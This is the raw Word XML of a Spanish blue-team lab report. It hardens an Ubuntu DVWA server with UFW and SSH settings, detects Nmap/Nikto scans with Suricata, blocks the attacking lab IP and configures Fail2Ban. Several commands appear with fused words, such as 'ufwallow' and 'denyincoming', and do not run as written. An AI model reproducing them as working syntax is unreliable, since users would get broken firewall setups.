        <w:t>El primer paso es preparar la máquina víctima (Ubuntu) para que no sea un blanco fácil.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuración del Firewall (UFW):</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t xml:space="preserve"> Cerramos todas las conexiones excepto las necesarias para el servicio (HTTP en puerto 80 y SSH en el 22).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:t>sudo ufw default denyincoming</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:t>sudo ufwallow 80/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:t>sudo ufwallow 22/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:t>sudo ufwenable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aseguramiento de SSH:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t xml:space="preserve"> Editamos /etc/ssh/sshd_config para deshabilitar el acceso de root: PermitRootLogin no.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="00476B4B" w:rsidP="004E1F54">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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2. Fase de Monitorización (Detección)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:r w:rsidRPr="004E1F54">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Para detectar al Red Team, configuramos </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t xml:space="preserve"> como IDS (Sistema de Detección de Intrusiones).</w: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Configuración de la Interfaz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:r w:rsidRPr="004E1F54">
        <w:t>Editamos suricata.yaml para que escuche en nuestra interfaz de red (ej. eth0 o enp0s3) y activamos el modo promiscuo para capturar todo el tráfico del segmento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:t>sudo ip link set eth0 promiscon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:t>sudo suricata-update (Para cargar firmas de ataques reales como Nmap o SQLi).</w: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Ejecución de la Escucha</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:r w:rsidRPr="004E1F54">
        <w:t>Usamos el comando que ya has probado con éxito para filtrar solo los ataques: sudo tail -f /var/log/suricata/fast.log | grep -iE "SCAN|SQL|Exploit"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="00476B4B" w:rsidP="004E1F54">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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 xml:space="preserve">3. Fase de Respuesta ante Incidentes </w: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Evidencia 1: Detección del Ataque</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRP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Hallazgo</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: Se detecta un escaneo de puertos masivo y un intento de acceso a directorios administrativos (ColdFusionadministratoraccess).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRP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IP Atacante</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: 192.168.0.126.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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IP Víctima</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: 192.168.0.91.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54"/>
    <w:p w:rsidR="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5399290" cy="3338623"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="666037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5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290" cy="33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54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54"/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Evidencia 2: Bloqueo (Mitigación)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:r w:rsidRPr="004E1F54">
        <w:t>Para detener al Red Team, procedemos a banear su IP inmediatamente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:t>sudo ufw</w:t>
      </w:r>
      <w:r w:rsidR="00216DB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>deny</w:t>
      </w:r>
      <w:r w:rsidR="00216DB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>from 192.168.0.126</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024476A" w:rsidRPr="004E1F54" w:rsidRDefault="0024476A" w:rsidP="0024476A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3429000" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33618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7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54" w:rsidRPr="004E1F54" w:rsidRDefault="00476B4B" w:rsidP="004E1F54">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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4. Herramienta Extra: Fail2Ban (Automatización)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:r w:rsidRPr="004E1F54">
        <w:t xml:space="preserve">Para no tener que bloquear manualmente, configuramos </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail2Ban</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRP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t>Instalación</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: sudo aptinstall fail2ban -y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRP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t>Función</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: Lee los logs de SSH y Apache. Si el Red Team falla 3 veces la contraseña, se bloquea su IP automáticamente por 10 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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t>Comando de verificación</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: sudo fail2ban-client status sshd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024476A" w:rsidRPr="004E1F54" w:rsidRDefault="0024476A" w:rsidP="0024476A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4914900" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="44160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1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54" w:rsidRPr="004E1F54" w:rsidRDefault="00476B4B" w:rsidP="004E1F54">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p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Resumen para el Informe Final</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: Mantener la disponibilidad del servidor Apache (DVWA) y detectar accesos no autorizados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Herramientas utilizadas</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: UFW (Firewall), Suricata (IDS), Fail2Ban (IPS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D51D9" w:rsidRDefault="004E1F54" w:rsidP="00070A55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F54">
        <w:t>: Se identificó un escaneo de Nmap y Nikto desde la IP 192.168.0.126. Se procedió al bloqueo mediante reglas de Firewall, logrando neutralizar el ataque.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006D51D9" w:rsidSect="00756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03E4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03E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00E3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAF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4749B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FE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655101"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9106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27187F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECE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F466D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B02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F14FFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A00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22351F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E7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8763D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD1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935C3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4A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FE24A29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D0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3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="17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E6699"/>
    <w:rsid w:val="00012D47"/>
    <w:rsid w:val="00070A55"/>
    <w:rsid w:val="00126D22"/>
    <w:rsid w:val="00162437"/>
    <w:rsid w:val="001B1B0E"/>
    <w:rsid w:val="00216DB2"/>
    <w:rsid w:val="0024476A"/>
    <w:rsid w:val="00395F25"/>
    <w:rsid w:val="00476B4B"/>
    <w:rsid w:val="004D6458"/>
    <w:rsid w:val="004E1F54"/>
    <w:rsid w:val="005E10D1"/>
    <w:rsid w:val="006D51D9"/>
    <w:rsid w:val="006E6699"/>
    <w:rsid w:val="00756165"/>
    <w:rsid w:val="00813B01"/>
    <w:rsid w:val="00814084"/>
    <w:rsid w:val="00856B6A"/>
    <w:rsid w:val="009B6674"/>
    <w:rsid w:val="00B43FB0"/>
    <w:rsid w:val="00B45D37"/>
    <w:rsid w:val="00C628DB"/>
    <w:rsid w:val="00CE3649"/>
    <w:rsid w:val="00D36B53"/>
    <w:rsid w:val="00E95899"/>
    <w:rsid w:val="00E97FC7"/>
    <w:rsid w:val="00F71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165"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5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5F2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628DB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://192.168.0.91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92.168.0.9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Jesús</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-22T18:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-27T18:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>